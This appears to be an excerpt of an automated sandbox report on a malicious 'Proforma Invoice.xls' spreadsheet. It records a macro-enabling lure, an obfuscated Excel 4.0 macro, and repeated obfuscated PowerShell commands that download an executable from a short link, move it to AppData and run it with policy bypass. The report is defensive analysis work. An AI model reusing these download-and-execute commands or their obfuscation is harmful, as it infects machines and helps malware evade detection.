Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: https://www.netlock.net/docs
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulas
Source: Proforma Invoice.xls | Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: Proforma Invoice.xls | Initial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xls | OLE, VBA macro line: Sub auto_open()
Source: Proforma Invoice.xls | OLE indicator, VBA macros: true
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal88.expl.evad.winXLS@13/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\A4FE0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRED89.tmp
Source: Proforma Invoice.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Proforma Invoice.xls | Virustotal: Detection: 14%
Source: Proforma Invoice.xls | ReversingLabs: Detection: 20%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: tomation.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdbFz source: powershell.exe, 00000007.00000002.2118359521.0000000002B54000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbem.M source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2118298362.0000000002A60000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2154366038.0000000002990000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
